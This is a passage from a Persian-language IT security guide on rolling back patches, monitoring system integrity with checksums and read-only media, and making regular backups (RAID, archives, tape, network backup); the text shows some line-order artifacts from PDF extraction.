ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺍﺣﻴﺎ ﻛﺮﺩ .ﺗﺤﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ ،ﺑﺮﻧﺎﻣﺔ ﺍﺻﻼﺡ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺣﺬﻑ ﻳﻚ ﺍﺻﻼﺡ ﺍﻋﻤﺎﻝﺷﺪﻩ ﻗﺒﻠﻲ ﻧﻴﺰ ﺑﻜـﺎﺭ ﺭﻭﺩ ،ﻳـﺎ
ﻧﺴﺨﻪ ﻗﺒﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻳﻚ ﻣﺨﺰﻥ CVSﺑﺎﺯﻳﺎﻓﺖ ﮔﺮﺩﺩ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻴﻠﻲ ﺳﺨﺖ ﺑﺎﺷﺪ ﻛﻪ ﻳﻚ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ﺳـﺎﻟﻢ ﻭ
ﺑﻲﺩﺭﺩﺳﺮ ﺑﻪ ﻋﻘﺐ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ .ﻫﺮﭼﻨﺪ ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻧـﺼﺐﺷـﺪﻩ ﺑـﺎ ﻳـﻚ
ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲﺗﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ،ﺍﻣﺎ ﺍﮔﺮ ﻭﺍﺑﺴﺘﮕﻴﻬﺎﻱ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻫﻢ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻪ ﺑﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻛﻪ ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲﺗـﺮ
ﺍﻳﻦ ﻭﺍﺑﺴﺘﮕﻴﻬﺎ ﻫﻢ ﭘﻴﺪﺍ ﻭ ﻧﺼﺐ ﺷﻮﻧﺪ .ﺑﻴﺸﺘﺮ )ﺍﻣﺎ ﻧﻪ ﻫﻤﺔ( ﺍﺻﻼﺣﻬﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ ﺭﺍ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺧـﻮﺩ ﺭﺍ
uninstallﻛﻨﻨﺪ ﻭ ﻳﺎ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺍﻱ uninstallﻛﺮﺩﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺎﺭﺑﺮ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﺭﺍﻫﻜﺎﺭ ﺩﻭﻡ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ ،ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺳﺖ .ﺑﺎ ﻧﮕﻬﺪﺍﺭﻱ ﻧﺴﺨﻪﻫـﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ
ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ،ﻋﻤﻮﻣﹰﺎ ﻧﺼﺐ ﻣﺠﺪﺩ ﻧﺴﺨﺔ ﻗﺒﻠﻲ ﻛﺎﺭ ﭼﻨﺪﺍﻥ ﻣﺸﻜﻠﻲ ﻧﻴﺴﺖ .ﭼﻨﺪﻳﻦ ﻧﺴﺨﻪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺷـﺎﺧﻪﻫـﺎﻱ ﻣﺠـﺰﺍ ﺩﺭ /usr/src
ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ ،ﻳﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻨﺘﺮﻝ ﻧﺴﺨﻪ ﻣﺎﻧﻨﺪ RCSﻳﺎ CVSﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﻣﺤﻠﻲ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﭼﻨﺪﻳﻦ ﻧﺴﺨﻪ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ
ﻳﻚ ﺷﺎﺧﻪ ﻭﺍﺣﺪ ﺑﻜﺎﺭ ﺭﻭﺩ.
ﺷﺎﻳﺪ ﻣﻄﻤﺌﻦﺗﺮﻳﻦ ﺭﻭﺵ ،ﺗﻬﻴﺔ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺍﺯ ﺳﻴﺴﺘﻢ ﭘﻴﺶ ﺍﺯ ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺕ ﺑﺎﺷﺪ ﺗﺎ ﭼﻨﺎﻧﭽﻪ ﻧﺼﺐ ﺍﺭﺗﻘﺎ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺍﻧﺠﺎﻡ
ﻧﺸﺪ ﺑﺘﻮﺍﻥ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ ﻗﺒﻠﻲ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ.
ﻧﻈﺎﺭﺕ ﺑﺮ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻧﺼﺐ
ﺯﻣﺎﻧﻴﻜﻪ ﺍﺻﻼﺣﻬﺎﻱ ﺟﺪﻳﺪ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻢ ﻳﻚ ﻗﺴﻤﺖ ﻣﻬـﻢ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻳﻜﭙـﺎﺭﭼﮕﻲ
ﺍﺳﺖ .ﻧﻜﺘﺔ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻣﻬﻢ ﺍﺳﺖ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺳﻴـﺴﺘﻢ -ﻭ ﺍﻃﻼﻋـﺎﺕ ﺑـﺎ ﺍﺭﺯﺵ ﺷـﻤﺎ -
ﺯﻣﺎﻧﻴﻜﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ ﻧﺪﺍﺭﻳﺪ ﺗﻐﻴﻴﺮ ﻧﻤﻲﻛﻨﻨﺪ .ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻫﻴﭻ ﻛﺎﺭﺑﺮ ﻳﺎ ﭘﺮﺩﺍﺯﺓ ﻏﻴﺮﻣﺠﺎﺯﻱ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﺪ .ﺩﺭ ﻋﻤﻞ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﺑﺮ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺑﻄﻮﺭ ﻣﺪﺍﻭﻡ ﻧﻈﺎﺭﺕ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﺭﺍ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻛﺸﻒ ﻭ ﺍﻃﻼﻋـﺎﺕ
ﺧﻮﺩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺁﺭﺷﻴﻮ ﻧﻤﺎﻳﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ ﻗﺒﻠﻲ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ.
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ
ﺑﺮﺍﻱ ﻣﺒﺎﺭﺯﻩ ﺑﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﭼﻨﺪﻳﻦ ﺭﺍﻩ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻋﻼﻭﻩ ﺑﺮ ﻣﺮﺍﻗﺒﺖ ﺩﺭ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺍﺧﺘﻴـﺎﺭﺍﺕ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻓﺎﻳﻠﻬـﺎ ،ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ
ﻣﻬﻤﻲ ﻛﻪ ﺩﻳﺮ ﺑﻪ ﺩﻳﺮ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻓﻘﻂ-ﺧﻮﺍﻧﺪﻧﻲ ١١٥ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ .ﻓﺎﻳﻠﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ
ﺷﻮﻧﺪ ﺗﺎ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻧﻬﺎ ﺑﻪ ﮔﺬﺭ ﺍﺯ ﻣﺮﺍﺣﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺑﺎﺷﺪ) .ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﺎﺭ ،ﻫﻤﭽﻨﺎﻥ ﺣﺬﻑ ﻳﺎ ﺧـﺮﺍﺏ
ﻛﺮﺩﻥ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ(.
ﻫﻤﭽﻨﻴﻦ ﺷﻴﻮﻩﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺁﺷﻜﺎﺭ ﻛﺮﺩﻥ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻮﭼﻜﺘﺮ ﻳﺎ ﻫﻨﮕﺎﻣﻴﮑﻪ ﺗﻌﺪﺍﺩ ﻓﺎﻳﻠﻬﺎﻱ ﻛﻠﻴﺪﻱ ﻛﻪ
ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﻣﺤﻔﺎﻇﺖ ﺷﻮﺩ ﻣﺤﺪﻭﺩ ﺍﺳﺖ ،ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻓﻘﻂ-ﻧﻮﺷﺘﻨﻲ ١١٦ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻣـﺆﺛﺮﻱ ﺑﺎﺷـﺪ.
ﻓﺎﻳﻠﻬﺎ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺎ ﻫﻤﺘﺎﻫﺎﻱ ﺁﺭﺷﻴﻮﺷﺪﺓ ﺧﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﮔﺮ ﻳﻚ ﻓﺎﻳﻞ ﺧﺮﺍﺏ ﺷﺪ ،ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺮﺍﻱ ﺍﺣﻴﺎﻱ ﺁﻥ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ،ﻭ ﻭﻗﺘﻲ ﻳﻚ ﺗﻐﻴﻴﺮ ﻣﺠﺎﺯ ﺑﻪ ﻓﺎﻳﻞ ﺩﺍﺩﻩ ﺷﻮﺩ ،ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﺑﺎ ﺁﻥ ﻫﻤﺎﻫﻨﮓ ﻣﻲﮔﺮﺩﺩ.
115 Read-Only Media
116 Write-Once Media
٣٠٧
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﺓ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ offlineﻣﺤﺎﺳﺒﻪ ﻭ ﺫﺧﻴﺮﻩ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺗﺤﺖ ﻣﺤﺎﻓﻈﺖ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ.
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﮔﻔﺘﻪ ﺷﺪ ﻳﻚ ﻭﻳﮋﮔﻲ ﻣﻬﻢ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﻓﺎﻳﻞ ﺟﺪﻳﺪﻱ ﺗﻮﻟﻴﺪ ﻛﺮﺩ ﻛﻪ ﺧﻼﺻﺔ ﺁﻥ ﺑـﺎ
ﺧﻼﺻﺔ ﻣﺤﺎﺳﺒﻪ ﺷﺪﻩ ﺗﻄﺒﻴﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻋﻤﻠﻜﺮﺩﻱ ﻣـﺸﺎﺑﻪ -ﻛـﻪ ﺍﻏﻠـﺐ inoculation
ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ -ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺁﻧﺠﺎ ﻛﻪ ﺳﺮﺟﻤﻌﻬﺎ ﻭﺍﺭﺩ ﻓﺎﻳﻠﻬـﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﻣـﻲﺷـﻮﻧﺪ .ﺩﺭ ﻓـﺼﻞ ﭘـﻨﺠﻢ ﺩﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ
ﻣﻘﺎﻳﺴﻪﺍﻱ ﻭ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺑﺮﺍﻱ ﻣﻤﻴﺰﻱ ﻣﺪﺍﻭﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺑﺤﺚ ﻣﻔﺼﻠﺘﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ.
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ
ﻻ ﻋﻠﻴﺮﻏﻢ ﺑﻬﺘﺮﻳﻦ ﺗﻼﺷﻬﺎ ﻧﻤﻲﺗـﻮﺍﻥ ﺍﺯ ﻭﻗـﻮﻉ
ﻧﻘﺼﻬﺎ ،ﺣﻮﺍﺩﺙ ،ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ،ﻭ ﺣﻤﻼﺕ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﻤﻲﺗﻮﺍﻥ ﭘﻴﺶﺑﻴﻨﻲ ﻛﺮﺩ ﻭ ﻣﻌﻤﻮ ﹰ
ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﻮﺩ؛ ﺍﻣﺎ ﺍﮔﺮ ﭘﻴﺸﺘﻴﺒﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺗﺮﻣﻴﻢ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑﻪ ﻳﻚ ﻭﺿﻌﻴﺖ ﭘﺎﻳﺪﺍﺭ ﺑﺮﺳﺎﻧﻴﺪ .ﺣﺘـﻲ ﺍﮔـﺮ
ﻼ ﺑﻪ ﻋﻠﺖ ﺁﺗﺶﺳﻮﺯﻱ -ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ ،ﺑﺎ ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻛﺎﻣﻞ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑﻌـﺪ ﺍﺯ ﺧﺮﻳـﺪ ﺩﺳـﺘﮕﺎﻩ
ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ -ﻣﺜ ﹰ
ﺟﺎﻳﮕﺰﻳﻦ ،ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ .ﻫﺰﻳﻨﺔ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻭ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﺟﺪﻳﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳـﻂ ﺷـﺮﻛﺖ ﺑﻴﻤـﻪ ﺗـﺄﻣﻴﻦ ﺷـﻮﺩ ،ﺍﻣـﺎ
ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﭼﻴﺰﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﻻ ﺑﺪﻭﻥ ﺩﻟﻴـﻞ ﻣﺸﺨـﺼﻲ ﺧـﺮﺍﺏ ﻣـﻲﺷـﺪ ﻭ
ﺳﺎﻟﻬﺎ ﻗﺒﻞ ،ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺭﻭﺯﺍﻧﻪ ﻛﺎﺭﻱ ﻣﺮﺳﻮﻡ ﺷﺪﻩ ﺑﻮﺩ ،ﭼﻮﻥ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺭﺍﻳﺎﻧﻪ ﻣﻌﻤﻮ ﹰ
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻨﻬﺎ ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺩﺍﺩﻩ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ .ﺍﻣﺮﻭﺯ ﻫﻢ ﺧﺮﺍﺑﻲ ﺳﺨﺖﺍﻓـﺰﺍﺭ ﻫﻨـﻮﺯ ﺩﻟﻴـﻞ ﺧـﻮﺑﻲ ﺑـﺮﺍﻱ ﺗﻬﻴـﻪ
ﻼ ﺗﺼﺎﺩﻓﻲ ﺍﺳﺖ ،ﭼﺮﺍﮐﻪ ﺣﺘﻲ ﺍﮔﺮ ﻳﻚ ﺩﻳﺴﻚ ﺳﺨﺖ ﺧﻮﺏ ﺑﻄـﻮﺭ
ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ .ﺍﺣﺘﻤﺎﻝ ﺧﺮﺍﺏ ﺷﺪﻥ ﺩﻳﺴﮏ ﺳﺨﺖ ﻛﺎﻣ ﹰ
ﻣﺘﻮﺳﻂ ۵ﺳﺎﻝ ﻳﺎ ﻛﻤﻲ ﺑﻴﺸﺘﺮ ﻋﻤﺮ ﻛﻨﺪ ،ﺳﺎﺯﻣﺎﻧﻲ ﺑﺎ ﺣﺪﻭﺩ ۲۰ﺗﺎ ۳۰ﺩﻳﺴﻚ ﺳﺨﺖ ﺑﺎﻳﺪ ﺩﺭ ﻫـﺮ ﭼﻨـﺪ ﻣـﺎﻩ ﻣﻨﺘﻈـﺮ ﻳـﻚ ﺧﺮﺍﺑـﻲ ﻗﺎﺑـﻞ
ﻻ ﺑﺪﻭﻥ ﻫﺸﺪﺍﺭ ﻗﺒﻠﻲ ﺧﺮﺍﺏ ﻣﻲﺷﻮﻧﺪ -ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺗﻨﻬﺎ ﭼﻨﺪ ﺭﻭﺯ ﺑﻌﺪ ﺍﺯ ﺁﻧﻜﻪ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻣﻼﺣﻈﻪ ﺑﺎﺷﺪ .ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﻣﻌﻤﻮ ﹰ
ﮔﺮﻓﺘﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛﺎﺭ ﻋﻘﻼﻧﻲ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻢ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺍﺳﺖ.
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺑﺰﺍﺭ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺑﺎﺷﻨﺪ .ﺑﺨﺼﻮﺹ ،ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ
ﻣﻲﺩﻫﺪ ﺑﺎ ﻣﻘﺎﻳﺴﺔ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻥ ،ﺁﻧﭽﻪ ﺭﺍ ﻣﻬﺎﺟﻢ ﻋﻮﺽ ﻛﺮﺩﻩ ﺑﻴﺎﺑﻴﺪ .ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺧـﻮﺩ ﺭﺍ
ﺑﻌﺪ ﺍﺯ ﻧﺼﺐ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺗﻬﻴﻪ ﻛﻨﻴﺪ ،ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﻮﺩ ﺭﺍ ﻧﺼﺐ ﻭ ﺍﺻﻼﺣﻬﺎﻱ ﻻﺯﻡ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺍﻋﻤﺎﻝ ﻧﻤﺎﻳﻴﺪ .ﺍﻭﻟـﻴﻦ
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺣﻤﻠﻪ ﺗﺤﻠﻴﻞ ﻛﻨﻴﺪ ﺗﺎ ﺑﻔﻬﻤﻴﺪ ﭼﻪ ﭼﻴـﺰﻱ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ ﺍﺳـﺖ ،ﺑﻠﻜـﻪ
ﻲ ﺳﺎﺧﺖ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﺩﻫﺪ.
ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺧﺮﺍﺑﻲ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻭﻗﻔﺔ ﺯﻣﺎﻧ ﹺ
ﭼﮕﻮﻧﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﻢ
•
•
•
•
•
•
ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺩﺭ ﺩﻳﺴﻚ ﻧﻮﺭﻱ ﻳﺎ ﺩﻳﺴﻚ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻣﺘﺤﺮﻙ ﺑﺎ ﻇﺮﻓﻴﺖ ﺯﻳﺎﺩ؛
ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺩﻳﺴﻚ ﺩﺭ ﻳﻚ ﺩﻳﺴﻚ spareﻳﺎ ﺍﻧﻌﻜﺎﺳﻲ؛
١١٧
ﺍﻧﻌﻜﺎﺳﻲ ﻛﺮﺩﻥ ﺩﻭ ﺩﻳﺴﻚ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ RAIDﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛
ﺗﻬﻴﺔ ﺑﺎﻳﮕﺎﻧﻴﻬﺎﻱ ﺩﻭﺭﻩﺍﻱ ،sit ،zipﻳﺎ tarﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ؛ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺁﻧﻬـﺎ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ﺍﻭﻟﻴـﻪ ﻭ ﻳـﺎ ﺩﺭ ﻣﻜـﺎﻧﻲ ﺩﻳﮕـﺮ
ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ؛
ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﻭﻱ ﻧﻮﺍﺭ ﻧﻮﺭﻱ ﻳﺎ ﻣﻐﻨﺎﻃﻴﺴﻲ؛ ﻭ
ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻳﺎ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﺩﻳﮕـﺮﻱ ﻛـﻪ ﺻـﺎﺣﺐ ﺁﻥ ﻫـﺴﺘﻴﺪ ،ﻳـﺎ ﺭﻭﻱ ﻳـﻚ ﺳـﺮﻭﻳﺲ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ.
117 Redundant Array of Independent Disks
